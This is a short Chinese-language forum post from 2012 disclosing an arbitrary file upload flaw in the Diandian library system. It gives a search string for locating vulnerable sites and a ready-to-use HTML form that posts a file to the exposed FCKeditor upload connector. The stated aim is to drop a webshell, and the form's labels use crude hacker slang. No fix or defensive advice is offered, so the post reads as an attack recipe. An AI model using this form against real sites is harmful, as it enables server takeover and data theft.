点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞作者:冰锋刺客
厂商:点击书(dianjishu.com)
日期:2012-6-21
I 概述
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
II 简介
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
补充一个漏洞
<form id="frmUpload" enctype="multipart/form-data"
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="操翻他">
</form>
你们懂的
那傻逼提供还需要改包.
自己看了下源代码发现fckeditor
直接秒杀
页:
[1]